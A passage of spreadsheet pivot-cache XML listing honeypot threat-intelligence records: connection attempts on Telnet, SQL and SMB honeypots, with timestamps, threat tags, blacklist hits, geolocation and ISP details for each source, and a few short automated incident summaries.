    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="17813"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="MTNL Delhi"/>
    <s v="2008-03-19"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7839:d9c8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="945"/>
    <x v="945"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T06:53:12"/>
    <d v="2025-02-22T12:48:03"/>
    <d v="2025-04-24T06:53:12"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="23&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="BH"/>
    <s v="Bahrain"/>
    <s v="14"/>
    <s v="Southern Governorate"/>
    <s v="NA"/>
    <s v="Riffa"/>
    <s v="385038"/>
    <s v="NA"/>
    <s v="26.13"/>
    <s v="50.555"/>
    <s v="51375"/>
    <s v="STC BAHRAIN B.S.C CLOSED"/>
    <s v="MENA-CORE"/>
    <s v="cellular"/>
    <s v="NA"/>
    <s v="2010-01-06"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6d3f:76bb"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="946"/>
    <x v="946"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T06:44:34"/>
    <d v="2025-01-09T11:48:01"/>
    <d v="2025-04-24T06:44:34"/>
    <n v="14"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Selatan"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.24205"/>
    <s v="106.842"/>
    <s v="38511"/>
    <s v="PT Remala Abadi"/>
    <s v="PT Remala Abadi"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2011-03-02"/>
    <s v="TACHYON-ID"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:65ff:527e"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="947"/>
    <x v="947"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T06:30:22"/>
    <d v="2025-04-24T06:24:21"/>
    <d v="2025-04-24T06:30:22"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="Multiplay-Prepaid"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d1:5765"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="948"/>
    <x v="948"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T06:18:45"/>
    <d v="2025-01-14T15:06:26"/>
    <d v="2025-04-24T06:18:45"/>
    <n v="17"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NKT"/>
    <s v="Kwai Tsing"/>
    <s v="NA"/>
    <s v="Kwai Chung"/>
    <s v="1819595"/>
    <s v="NA"/>
    <s v="22.3702"/>
    <s v="114.13"/>
    <s v="137899"/>
    <s v="I LAYER LIMITED"/>
    <s v="I LAYER LIMITED"/>
    <s v="business"/>
    <s v="HK JIUJIUIDC TECHNOLOGY LIMITED"/>
    <s v="2014-09-04"/>
    <s v="HJTL-HK"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.38.80.91,52815)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6726:505b"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Possible malicious activity is a remote connection attempt to a shared resource._x000a_The attacker's IP address is 103.38.80.91 and the port used is 52815._x000a_This may indicate an attempted unauthorized access or data theft. &amp;&amp; An incoming connection from an external IP address is attempting to access a shared resource on the system, which could be indicative of a potential attack or unauthorized access attempt. The source IP (103.38.80.91) may be a malicious actor trying to exploit vulnerabilities in SMB services. This activity suggests an attempt to gain unauthorized access or launch a malware spread via file-sharing."/>
    <s v="Port Scan &amp;&amp; Port Scan"/>
  </r>
  <r>
    <x v="949"/>
    <x v="949"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T06:15:24"/>
    <d v="2025-04-24T06:15:24"/>
    <d v="2025-04-24T06:15:24"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="Nib"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ce:b87a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="950"/>
    <x v="950"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T05:34:57"/>
    <d v="2025-04-24T05:34:57"/>
    <d v="2025-04-24T05:34:57"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MP"/>
    <s v="Madhya Pradesh"/>
    <s v="Raisen"/>
    <s v="Begamganj"/>
    <s v="1276621"/>
    <s v="NA"/>
    <s v="23.5992"/>
    <s v="78.3406"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb8:3b9d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="951"/>
    <x v="951"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T05:34:02"/>
    <d v="2025-04-23T20:33:54"/>
    <d v="2025-04-24T05:34:02"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5c:3d7b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="952"/>
    <x v="952"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T05:28:41"/>
    <d v="2025-04-24T05:28:41"/>
    <d v="2025-04-24T05:28:41"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d2:bb27"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="953"/>
    <x v="953"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T05:15:36"/>
    <d v="2025-04-24T05:15:36"/>
    <d v="2025-04-24T05:15:36"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="corporate"/>
    <s v="BSNL GSM EastZone"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b62:1471"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="954"/>
    <x v="954"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T05:13:55"/>
    <d v="2025-04-24T05:13:55"/>
    <d v="2025-04-24T05:13:55"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:5054"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="955"/>
    <x v="955"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T05:12:52"/>
    <d v="2025-04-23T19:23:24"/>
    <d v="2025-04-24T05:12:52"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e9:ea07"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="956"/>
    <x v="956"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T05:02:02"/>
    <d v="2025-04-24T05:02:02"/>
    <d v="2025-04-24T05:02:02"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="Beyoğlu"/>
    <s v="Istanbul"/>
    <s v="745044"/>
    <s v="34122"/>
    <s v="41.0315"/>
    <s v="28.9748"/>
    <s v="16135"/>
    <s v="TURKCELL-AS"/>
    <s v="Turkcell Iletisim Hizmetleri A.S."/>
    <s v="corporate"/>
    <s v="Turkcell Iletisim Hizmetleri"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b05b:206a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="957"/>
    <x v="957"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T05:01:40"/>
    <d v="2025-02-17T16:25:58"/>
    <d v="2025-04-24T05:01:40"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="2010-08-02"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:e37:ea9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="958"/>
    <x v="958"/>
    <s v="NA&amp;&amp;125-228-142-54.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-24T04:24:56"/>
    <d v="2025-01-19T23:21:00"/>
    <d v="2025-04-24T04:24:56"/>
    <n v="139"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;36400"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de4:8e36"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No log data provided, unable to analyze. &amp;&amp; No log data provided, unable to analyze."/>
    <m/>
  </r>
  <r>
    <x v="959"/>
    <x v="959"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T04:00:55"/>
    <d v="2025-03-20T15:55:03"/>
    <d v="2025-04-24T04:00:55"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="BG"/>
    <s v="Bulgaria"/>
    <s v="02"/>
    <s v="Burgas"/>
    <s v="Sozopol"/>
    <s v="Sozopol"/>
    <s v="726963"/>
    <s v="8130"/>
    <s v="42.418"/>
    <s v="27.6956"/>
    <s v="29084"/>
    <s v="Comnet Bulgaria Holding Ltd."/>
    <s v="ComNet Bulgaria Ltd."/>
    <s v="residential"/>
    <s v="Comnet Bulgaria Holding Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5436:b3a5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="960"/>
    <x v="960"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T03:46:00"/>
    <d v="2025-04-24T03:46:00"/>
    <d v="2025-04-24T03:46:00"/>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f:b45e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="961"/>
    <x v="961"/>
    <s v="NA&amp;&amp;191-7-113-89.teleturbo.net.br"/>
    <x v="0"/>
    <d v="2025-04-24T03:43:37"/>
    <d v="2024-03-08T21:35:00"/>
    <d v="2025-04-24T03:43:37"/>
    <n v="105"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H44&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;35667&amp;&amp;23&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="MT"/>
    <s v="Mato Grosso"/>
    <s v="Tangará da Serra"/>
